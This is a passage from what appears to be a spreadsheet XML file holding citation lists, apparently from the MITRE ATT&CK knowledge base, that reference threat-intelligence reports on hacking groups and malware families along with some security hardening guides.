    <t>(Citation: Microsoft Actinium February 2022),(Citation: Unit 42 Inception November 2018),(Citation: ClearSky Lazarus Aug 2020),(Citation: US-CERT TA18-074A),(Citation: Unit 42 Gamaredon February 2022),(Citation: Secureworks IRON TILDEN Profile),(Citation: TrendMicro Gamaredon April 2020),(Citation: ESET Gamaredon June 2020),(Citation: McAfee Lazarus Jul 2020),(Citation: Unit42 Sofacy Dec 2018),(Citation: Unit 42 Tropic Trooper Nov 2016),(Citation: Cybereason Chaes Nov 2020),(Citation: Unit 42 Phishery Aug 2018),(Citation: Proofpoint RTF Injection),(Citation: CERT-EE Gamaredon January 2021),(Citation: Talos Frankenstein June 2019),(Citation: Uptycs Confucius APT Jan 2021),(Citation: Anomali Template Injection MAR 2018),(Citation: Microsoft Disable Macros)</t>
  </si>
  <si>
    <t>(Citation: ESET Kobalos Jan 2021),(Citation: Kaspersky Turla Penquin December 2014),(Citation: Mandiant - Synful Knock),(Citation: Chronicle Winnti for Linux May 2019),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Leonardo Turla Penquin May 2020),(Citation: Bleeping Computer - Ryuk WoL),(Citation: Umbreon Trend Micro),(Citation: ESET Kobalos Feb 2021),(Citation: Chaos Stolen Backdoor),</t>
  </si>
  <si>
    <t>(Citation: Bitdefender StrongPity June 2020),</t>
  </si>
  <si>
    <t>(Citation: Leonardo Turla Penquin May 2020),</t>
  </si>
  <si>
    <t>(Citation: Github PowerShell Empire),(Citation: Talos Frankenstein June 2019),(Citation: Palo Alto PlugX June 2017),(Citation: Microsoft WDAC)</t>
  </si>
  <si>
    <t>(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: FireEye APT10 April 2017),(Citation: CrowdStrike StellarParticle January 2022),(Citation: DOJ APT10 Dec 2018),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: DOJ GRU Indictment Jul 2018),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Symantec Cicada November 2020),(Citation: Microsoft POLONIUM June 2022),(Citation: MSTIC Nobelium Oct 2021),(Citation: Secureworks REvil September 2019),(Citation: Profero APT27 December 2020),(Citation: Office 365 Partner Relationships),(Citation: Microsoft Nobelium Admin Privileges)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Astaroth Feb 2019),(Citation: MS14-025),(Citation: Microsoft MS14-025),(Citation: RedLock Instance Metadata API 2018),(Citation: ADSecurity Finding Passwords in SYSVOL)</t>
  </si>
  <si>
    <t>(Citation: Aqua Kinsing April 2020),</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Hildegard Malware),(Citation: Cisco Talos Intelligence Group),(Citation: Peirates GitHub),(Citation: Trend Micro TeamTNT),(Citation: Amazon AWS IMDS V2),(Citation: RedLock Instance Metadata API 2018)</t>
  </si>
  <si>
    <t>(Citation: Peirates GitHub),(Citation: Kubernetes API Control Access),(Citation: Docker Daemon Socket Protect),(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: GitHub PoshC2),(Citation: GitHub Pupy),(Citation: Invincea XTunnel),(Citation: Volexity Patchwork June 2018),(Citation: Cisco Talos Intelligence Group),(Citation: Symantec MuddyWater Dec 2018),(Citation: Talos Smoke Loader July 2018),(Citation: Symantec Leafminer July 2018),(Citation: Securelist BlackEnergy Nov 2014),(Citation: GitHub LaZagne Dec 2018),(Citation: AADInternals Documentation),(Citation: Cado Security TeamTNT Worm August 2020),(Citation: F-Secure BlackEnergy 2014),(Citation: FireEye APT35 2018),(Citation: Unit 42 Hildegard Malware),(Citation: Github PowerShell Empire),(Citation: CERT-FR PYSA April 2020),(Citation: Unit42 Azorult Nov 2018),(Citation: FireEye APT33 Guardrail),(Citation: US-CERT Emotet Jul 2018),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Kaspersky Adwind Feb 2016),(Citation: Symantec Elfin Mar 2019),(Citation: Unit 42 Playbook Dec 2017),(Citation: CrowdStrike Putter Panda),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Proofpoint TA505 Sep 2017),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Cyberreason Anchor December 2019),(Citation: TrendMicro Trickbot Feb 2019),(Citation: Symantec Buckeye),(Citation: Trend Micro Trickbot Nov 2018),(Citation: CIS Emotet Dec 2018),(Citation: FireEye APT34 July 2019),(Citation: GitHub QuasarRAT),(Citation: Trend Micro TeamTNT),</t>
  </si>
  <si>
    <t>(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: TrendMicro Trickbot Feb 2019),(Citation: SentinelOne Valak June 2020),(Citation: Cybereason Oceanlotus May 2017),(Citation: CrowdStrike IceApple May 2022),(Citation: Pentestlab Stored Credentials),</t>
  </si>
  <si>
    <t>(Citation: PowerSploit Documentation),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: GitHub PowerSploit May 2012),(Citation: Symantec Elfin Mar 2019),(Citation: FireEye APT33 Guardrail),(Citation: MS14-025),(Citation: Microsoft MS14-025),(Citation: ADSecurity Finding Passwords in SYSVOL)</t>
  </si>
  <si>
    <t>(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: Anomali Rocke March 2019),(Citation: ESET Machete July 2019),(Citation: Kaspersky Adwind Feb 2016),(Citation: Adsecurity Mimikatz Guide),(Citation: AADInternals Documentation),(Citation: Cado Security TeamTNT Worm August 2020),(Citation: Microsoft 365 Defender Solorigate),(Citation: Aqua Kinsing April 2020),(Citation: ESET Ebury Feb 2014),(Citation: Unit 42 Hildegard Malware),(Citation: Github PowerShell Empire),(Citation: FoxIT Wocao December 2019),(Citation: MSTIC FoggyWeb September 2021),(Citation: Trend Micro TeamTNT),</t>
  </si>
  <si>
    <t>,(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>(Citation: MSTIC FoggyWeb September 2021),(Citation: Secureworks IRON RITUAL Profile),(Citation: Microsoft 365 Defender Solorigate),</t>
  </si>
  <si>
    <t>(Citation: Microsoft POLONIUM June 2022),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Peirates GitHub),(Citation: Trend Micro Pawn Storm OAuth 2017),(Citation: Microsoft Azure AD Admin Consent)</t>
  </si>
  <si>
    <t>(Citation: Cybereason Cobalt Kitty 2017),(Citation: Cybereason Soft Cell June 2019),(Citation: CISA AA20-301A Kimsuky),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: GitHub PoshC2),(Citation: Mandiant APT1),(Citation: McAfee Night Dragon),(Citation: CME Github September 2018),(Citation: Adsecurity Mimikatz Guide),(Citation: Microsoft SIR Vol 19),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: NCSC Joint Report Public Tools),(Citation: Github PowerShell Empire),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: NCC Group Chimera January 2021),(Citation: GitHub IAD Secure Host Baseline UAC Filtering),(Citation: NSA Spotting)</t>
  </si>
  <si>
    <t>(Citation: Symantec Seaduke 2015),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Adsecurity Mimikatz Guide),(Citation: Mandiant No Easy Breach),(Citation: Harmj0y DCSync Sept 2015),(Citation: GitHub Pupy),(Citation: NCSC Joint Report Public Tools),(Citation: AdSecurity Kerberos GT Aug 2015),(Citation: ADSecurity AD Kerberos Attacks),(Citation: ADSecurity Kerberos and KRBTGT),(Citation: STIG krbtgt reset)</t>
  </si>
  <si>
    <t>(Citation: Volexity SolarWinds),(Citation: CrowdStrike StellarParticle January 2022),</t>
  </si>
  <si>
    <t>(Citation: MSTIC DEV-0537 Mar 2022),(Citation: win10_asr)</t>
  </si>
  <si>
    <t>(Citation: Microsoft DUBNIUM July 2016),(Citation: Check Point APT34 April 2021),(Citation: Proofpoint TA416 Europe March 2022),(Citation: Carbon Black HotCroissant April 2020),(Citation: ESET OceanLotus Mar 2019),(Citation: ESET T3 Threat Report 2021),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: Accenture MUDCARP March 2019),(Citation: Cybereason Valak May 2020),(Citation: Cybereason Molerats Dec 2020),(Citation: Volexity Patchwork June 2018),(Citation: Proofpoint TA505 June 2018),(Citation: SecureList Silence Nov 2017),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: ESET Casbaneiro Oct 2019),(Citation: Trend Micro Qakbot May 2020),(Citation: ESET OceanLotus),(Citation: TrendMicro Gamaredon April 2020),(Citation: Carbon Black Emotet Apr 2019),(Citation: Trend Micro TA505 June 2019),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: Talos PoetRAT April 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Rewterz Sidewinder COVID-19 June 2020),(Citation: Carbon Black JCry May 2019),(Citation: Rewterz Sidewinder APT April 2020),(Citation: Lazarus APT January 2022),(Citation: CSM Elderwood Sept 2012),(Citation: Unit 42 Gamaredon February 2022),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: ClearSky Siamesekitten August 2021),(Citation: TrendMicro Taidoor),(Citation: Unit 42 Playbook Dec 2017),(Citation: McAfee Bankshot),(Citation: Trend Micro Qakbot December 2020),(Citation: Kaspersky QakBot September 2021),(Citation: Bitdefender StrongPity June 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: ESET Gamaredon June 2020),(Citation: CrowdStrike Grim Spider May 2019),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Trend Micro Banking Malware Jan 2019),(Citation: Talos MuddyWater Jan 2022),(Citation: Symantec WastedLocker June 2020),(Citation: FireEye Hancitor),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Talos Oblique RAT March 2021),(Citation: FireEye Metamorfo Apr 2018),(Citation: Proofpoint TA459 April 2017),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Google EXOTIC LILY March 2022),(Citation: Talos Promethium June 2020),(Citation: Cybereason Oceanlotus May 2017),(Citation: VirusBulletin Kimsuky October 2019),(Citation: Avira Mustang Panda January 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: FireEye NETWIRE March 2019),(Citation: Dragos Hexane),(Citation: eSentire FIN7 July 2021),(Citation: 360 Machete Sep 2020),(Citation: Cylance Machete Mar 2017),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Securelist Octopus Oct 2018),(Citation: Reaqta MuddyWater November 2017),(Citation: Crowdstrike Helix Kitten Nov 2018),(Citation: Malwarebytes Kimsuky June 2021),(Citation: CISA AppleJeus Feb 2021),(Citation: Malwarebytes Konni Aug 2021),(Citation: Bitdefender Agent Tesla April 2020),(Citation: G Data Sodinokibi June 2019),(Citation: Symantec Elderwood Sept 2012),(Citation: ThreatConnect Kimsuky September 2020),(Citation: Talos Bisonal Mar 2020),(Citation: IBM Grandoreiro April 2020),(Citation: Symantec Whitefly March 2019),(Citation: Kaspersky WIRTE November 2021),(Citation: Cybereason Bumblebee August 2022),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Symantec Inception Framework March 2018),(Citation: FireEye APT29 Nov 2018),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Picus Sodinokibi January 2020),(Citation: Unit 42 Valak July 2020),(Citation: Symantec Shuckworm January 2022),(Citation: ProofPoint SettingContent-ms July 2018),(Citation: FireEye APT39 Jan 2019),(Citation: Secure List Bad Rabbit),(Citation: Proofpoint Leviathan Oct 2017),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: Rancor Unit42 June 2018),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: IBM TA505 April 2020),(Citation: Unit42 Molerat Mar 2020),(Citation: FireEye Hacking FIN4 Video Dec 2014),(Citation: Symantec Bumblebee June 2022),(Citation: TrendMicro Msiexec Feb 2018),(Citation: Proofpoint TA505 Mar 2018),(Citation: SentinelOne Valak June 2020),(Citation: TrendMicro Tonto Team October 2020),(Citation: FireEye APT37 Feb 2018),(Citation: Carbon Black Shlayer Feb 2019),(Citation: FireEye MuddyWater Mar 2018),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: ESET Bad Rabbit),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Cyble Sidewinder September 2020),(Citation: Malwarebytes Pony April 2016),(Citation: Talos Frankenstein June 2019),(Citation: Uptycs Confucius APT Jan 2021),(Citation: FireEye FIN7 April 2017),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: SANS Windshift August 2018),(Citation: FireEye APT10 Sept 2018),(Citation: Talos Lokibot Jan 2021),(Citation: Proofpoint TA505 October 2019),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Qualys LolZarus),(Citation: FireEye APT10 April 2017),(Citation: Trend Micro DRBControl February 2020),(Citation: Cylance Shaheen Nov 2018),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: NTT Security Flagpro new December 2021),(Citation: Gigamon Berserk Bear October 2021),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: Intego Shlayer Feb 2018),(Citation: Malwarebytes Higaisa 2020),(Citation: FireEye APT32 April 2020),(Citation: Unit 42 ProjectM March 2016),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Unit 42 Sofacy Feb 2018),(Citation: Accenture Hogfish April 2018),(Citation: Anomali Static Kitten February 2021),(Citation: ESET Telebots Dec 2016),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Talos Kimsuky Nov 2021),(Citation: Unit 42 NETWIRE April 2020),(Citation: FireEye APT30),(Citation: Symantec Chafer February 2018),(Citation: Trend Micro Tick November 2019),(Citation: ClearSky Lazarus Aug 2020),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: ClearSky MuddyWater June 2019),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: Cyber Forensicator Silence Jan 2019),(Citation: Unit 42 TA551 Jan 2021),(Citation: Unit42 Redaman January 2019),(Citation: ESET Nomadic Octopus 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Unit 42 Inception November 2018),(Citation: CheckPoint Naikon May 2020),(Citation: ESET Machete July 2019),(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: McAfee Honeybee),(Citation: ATT Sidewinder January 2021),(Citation: Check Point Warzone Feb 2020),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Mandiant UNC3890 Aug 2022),(Citation: CERT-EE Gamaredon January 2021),(Citation: FireEye admin@338),(Citation: CheckPoint Bandook Nov 2020),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Securelist MuddyWater Oct 2018),(Citation: Proofpoint TA505 Sep 2017),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: CrowdStrike Wizard Spider October 2020),(Citation: Zscaler Higaisa 2020),(Citation: McAfee Sharpshooter December 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: FireEye APT19),(Citation: Crowdstrike Qakbot October 2020),(Citation: FBI FLASH APT39 September 2020),(Citation: Antiy CERT Ramsay April 2020),(Citation: FireEye Obfuscation June 2017),(Citation: TrendMicro BlackTech June 2017),(Citation: Cybereason Kimsuky November 2020),(Citation: Recorded Future REDDELTA July 2020),(Citation: Cybereason TA505 April 2019),(Citation: Flashpoint FIN 7 March 2019),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Microsoft Holmium June 2020),(Citation: Unit 42 CARROTBAT November 2018),(Citation: Moran 2014),(Citation: ESET Dukes October 2019),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: BitDefender Chafer May 2020),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Cyberint Qakbot May 2021),(Citation: Kroll Qakbot June 2020),(Citation: F-Secure The Dukes),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: FireEye Fin8 May 2016),(Citation: CISA AA20-301A Kimsuky),(Citation: Juniper IcedID June 2020),(Citation: Checkpoint Dridex Jan 2021),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Talos Cobalt Group July 2018),(Citation: Cybereason Chaes Nov 2020),(Citation: Unit 42 Cobalt Gang Oct 2018),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: ESET Operation Spalax Jan 2021),(Citation: Talos Transparent Tribe May 2021),(Citation: Kaspersky MoleRATs April 2019),(Citation: Secureworks IRON HEMLOCK Profile),(Citation: Trend Micro IXESHE 2012),(Citation: Microsoft Actinium February 2022),(Citation: US-CERT TYPEFRAME June 2018),(Citation: Anomali Pirate Panda April 2020),(Citation: Talos MuddyWater May 2019),(Citation: Securelist Machete Aug 2014),(Citation: AhnLab Andariel Subgroup of Lazarus June 2018),(Citation: IBM IcedID November 2017),(Citation: FOX-IT May 2016 Mofang),(Citation: SecureWorks August 2019),(Citation: Unit 42 CARROTBAT January 2020),(Citation: ATT QakBot April 2021),(Citation: Trend Micro Muddy Water March 2021),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Proofpoint NETWIRE December 2020),(Citation: FireEye Operation Saffron Rose 2013),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: Cyberreason Anchor December 2019),(Citation: TrendMicro Trickbot Feb 2019),(Citation: Visa FIN6 Feb 2019),(Citation: HackerNews IndigoZebra July 2021),(Citation: Securelist Darkhotel Aug 2015),(Citation: Secureworks IRON TILDEN Profile),(Citation: Microsoft PLATINUM April 2016),(Citation: Group IB RTM August 2019),(Citation: Group IB Ransomware September 2020),(Citation: Symantec Tick Apr 2016),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: ClearSky Kittens Back 3 August 2020),(Citation: Symantec Gallmaker Oct 2018),(Citation: ESET InvisiMole June 2020),(Citation: Google TAG Ukraine Threat Landscape March 2022),(Citation: Group IB Silence Sept 2018),(Citation: Unit 42 KerrDown February 2019),(Citation: Proofpoint TA505 Jan 2019),(Citation: McAfee REvil October 2019),(Citation: win10_asr)</t>
  </si>
  <si>
    <t>(Citation: Lacework TeamTNT May 2021),(Citation: Content trust in Docker),(Citation: Content trust in Azure Container Registry)</t>
  </si>
  <si>
    <t>(Citation: ESET EvilNum July 2020),(Citation: Proofpoint TA416 Europe March 2022),(Citation: KISA Operation Muzabi),(Citation: Volexity Patchwork June 2018),(Citation: Proofpoint TA505 June 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: Trend Micro Qakbot May 2020),(Citation: Carbon Black Emotet Apr 2019),(Citation: Trend Micro TA505 June 2019),(Citation: TrendMicro EarthLusca 2022),(Citation: Rewterz Sidewinder COVID-19 June 2020),(Citation: Secureworks IRON RITUAL USAID Phish May 2021),(Citation: Rewterz Sidewinder APT April 2020),(Citation: FireEye Clandestine Wolf),(Citation: CSM Elderwood Sept 2012),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: TrendMicro Confucius APT Aug 2021),(Citation: Volexity Ocean Lotus November 2020),(Citation: Trend Micro Qakbot December 2020),(Citation: Kaspersky QakBot September 2021),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Trend Micro Banking Malware Jan 2019),(Citation: Talos Oblique RAT March 2021),(Citation: Google EXOTIC LILY March 2022),(Citation: FireEye NETWIRE March 2019),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Threatpost Hancitor),(Citation: Cylance Machete Mar 2017),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Crowdstrike Helix Kitten Nov 2018),(Citation: FireEye Shining A Light on DARKSIDE May 2021),(Citation: Unit 42 BackConfig May 2020),(Citation: CISA AppleJeus Feb 2021),(Citation: Symantec Elderwood Sept 2012),(Citation: IBM Grandoreiro April 2020),(Citation: McAfee Night Dragon),(Citation: Cybereason Bazar July 2020),(Citation: Cybereason Bumblebee August 2022),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: FireEye APT29 Nov 2018),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: McAfee Dianxun March 2021),(Citation: Symantec Elfin Mar 2019),(Citation: ProofPoint SettingContent-ms July 2018),(Citation: FireEye APT39 Jan 2019),(Citation: Certfa Charming Kitten January 2021),(Citation: FireEye APT33 Sept 2017),(Citation: Proofpoint Leviathan Oct 2017),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: JPCert TSCookie March 2018),(Citation: Unit42 Molerat Mar 2020),(Citation: FireEye Hacking FIN4 Video Dec 2014),(Citation: Proofpoint TA505 Mar 2018),(Citation: Crowdstrike MUSTANG PANDA June 2018),(Citation: Cyble Sidewinder September 2020),(Citation: Malwarebytes Pony April 2016),(Citation: Symantec Patchwork),(Citation: SANS Windshift August 2018),(Citation: Google Election Threats October 2020),(Citation: Proofpoint TA505 October 2019),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: MSTIC NOBELIUM May 2021),(Citation: Anomali Static Kitten February 2021),(Citation: Unit 42 NETWIRE April 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: ESET Grandoreiro April 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: ESET Machete July 2019),(Citation: ATT Sidewinder January 2021),(Citation: Proofpoint TA505 Sep 2017),(Citation: CrowdStrike Wizard Spider October 2020),(Citation: US District Court Indictment GRU Oct 2018),(Citation: ESET Turla Mosquito Jan 2018),(Citation: FBI FLASH APT39 September 2020),(Citation: FireEye Obfuscation June 2017),(Citation: TrendMicro BlackTech June 2017),(Citation: Cybereason TA505 April 2019),(Citation: CISA AA21-200A APT40 July 2021),(Citation: ESET Dukes October 2019),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: Kroll Qakbot June 2020),(Citation: ESET Lazarus Jun 2020),(Citation: FireEye Fin8 May 2016),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Talos Cobalt Group July 2018),(Citation: Unit 42 Cobalt Gang Oct 2018),(Citation: ESET Operation Spalax Jan 2021),(Citation: Zscaler Bazar September 2020),(Citation: Talos Transparent Tribe May 2021),(Citation: Kaspersky MoleRATs April 2019),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: Securelist Machete Aug 2014),(Citation: FOX-IT May 2016 Mofang),(Citation: ATT QakBot April 2021),(Citation: Trend Micro Muddy Water March 2021),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Group IB Ransomware September 2020),(Citation: ClearSky Kittens Back 3 August 2020),(Citation: Proofpoint TA505 Jan 2019),</t>
  </si>
  <si>
    <t>(Citation: RSA2017 Detect and Respond Adair),(Citation: Cycraft Chimera April 2020),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: Anomali Linux Rabbit 2018),(Citation: Trend Micro Pawn Storm April 2017),(Citation: Symantec Cicada November 2020),(Citation: Gigamon Berserk Bear October 2021),(Citation: Accenture MUDCARP March 2019),(Citation: Symantec Suckfly May 2016),(Citation: Cybereason Soft Cell June 2019),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: PWC Cloud Hopper April 2017),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: McAfee Night Dragon),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: CISA AA20-296A Berserk Bear December 2020),(Citation: Novetta-Axiom),(Citation: Securelist APT10 March 2021),(Citation: FireEye APT41 Aug 2019),(Citation: FireEye APT33 Webinar Sept 2017),(Citation: CyberBit Dtrack),(Citation: Microsoft STRONTIUM Aug 2019),(Citation: Aqua Kinsing April 2020),(Citation: Bizeul 2014),(Citation: US-CERT Ukraine Feb 2016),(Citation: FireEye FIN6 Apr 2019),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: FireEye APT33 Guardrail),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Symantec Seaduke 2015),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye FIN6 April 2016),(Citation: DarkReading FireEye FIN5 Oct 2015),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Kaspersky Carbanak),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: FireEye APT39 Jan 2019),(Citation: FireEye FIN10 June 2017),(Citation: Unit 42 Playbook Dec 2017),(Citation: ESET Industroyer),(Citation: Microsoft POLONIUM June 2022),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FoxIT Wocao December 2019),(Citation: FireEye Hacking FIN4 Video Dec 2014),(Citation: FireEye Respond Webinar July 2017),(Citation: Visa FIN6 Feb 2019),(Citation: US-CERT TA18-074A),(Citation: DOJ Iran Indictments March 2018),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: FireEye TRITON 2019),(Citation: CrowdStrike Grim Spider May 2019),(Citation: Microsoft NICKEL December 2021),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Symantec W32.Duqu),(Citation: Dell TG-3390),(Citation: Group IB Silence Sept 2018),(Citation: Microsoft Securing Privileged Access),(Citation: TechNet Credential Theft),(Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet),(Citation: TechNet Least Privilege)</t>
  </si>
  <si>
    <t>(Citation: Microsoft Holmium June 2020),(Citation: Roadtools),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Microsoft NICKEL December 2021),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Peirates GitHub),(Citation: AWS - IAM Console Best Practices),(Citation: TechNet Credential Theft),(Citation: TechNet Least Privilege)</t>
  </si>
  <si>
    <t>(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Accenture HyperStack October 2020),(Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet)</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Bitdefender Naikon April 2021),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: NCSC APT29 July 2020),(Citation: ESET Dukes October 2019),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Dell TG-1314),(Citation: Unit 42 Shamoon3 2018),(Citation: FireEye Shamoon Nov 2016),(Citation: CobaltStrike Daddy May 2017),(Citation: McAfee Night Dragon),(Citation: Crowdstrike Indrik November 2018),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Microsoft POLONIUM June 2022),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: FoxIT Wocao December 2019),(Citation: IBM TA505 April 2020),(Citation: ANSSI RYUK RANSOMWARE),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Symantec Buckeye),(Citation: cobaltstrike manual),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Netscout Stolen Pencil Dec 2018),(Citation: FireEye APT32 May 2017),(Citation: FireEye Exchange Zero Days March 2021),(Citation: CobaltStrike Daddy May 2017),(Citation: US-CERT NotPetya 2017),(Citation: Bitdefender StrongPity June 2020),(Citation: CrowdStrike StellarParticle January 2022),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Malwarebytes Emotet Dec 2017),(Citation: FireEye FIN10 June 2017),(Citation: cobaltstrike manual),(Citation: Talos Nyetya June 2017),(Citation: Umbreon Trend Micro),(Citation: FoxIT Wocao December 2019),(Citation: ESET Crutch December 2020),(Citation: Microsoft Remote Use of Local),(Citation: TechNet Credential Theft),(Citation: TechNet Least Privilege)</t>
  </si>
  <si>
    <t>(Citation: QiAnXin APT-C-36 Feb2019),(Citation: DigiTrust Agent Tesla Jan 2017),(Citation: ESET InvisiMole June 2018),(Citation: Proofpoint TA505 October 2019),(Citation: Kaspersky TajMahal April 2019),(Citation: Cofense RevengeRAT Feb 2019),(Citation: Talos ZxShell Oct 2014),(Citation: jRAT Symantec Aug 2018),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Cylance Shaheen Nov 2018),(Citation: Zscaler Cobian Aug 2017),(Citation: GitHub Pupy),(Citation: 360 Machete Sep 2020),(Citation: DigiTrust NanoCore Jan 2017),(Citation: Cylance Machete Mar 2017),(Citation: Volexity Patchwork June 2018),(Citation: EFF Manul Aug 2016),(Citation: SecureList Silence Nov 2017),(Citation: Palo Alto T9000 Feb 2016),(Citation: Talos Agent Tesla Oct 2018),(Citation: PaloAlto NanoCore Feb 2016),(Citation: Anomali Static Kitten February 2021),(Citation: Fortinet Remcos Feb 2017),(Citation: Talos PoetRAT April 2020),(Citation: Github PowerShell Empire),(Citation: Malwarebytes DarkComet March 2018),(Citation: Uptycs Warzone UAC Bypass November 2020),(Citation: Kaspersky Adwind Feb 2016),(Citation: Securelist Machete Aug 2014),(Citation: Check Point Warzone Feb 2020),(Citation: DOJ FIN7 Aug 2018),(Citation: Unit 42 Kazuar May 2017),(Citation: TrendMicro DarkComet Sept 2014),(Citation: Imminent Unit42 Dec2019),(Citation: Fidelis njRAT June 2013),(Citation: Talent-Jump Clambling February 2020),(Citation: IBM TA505 April 2020),(Citation: 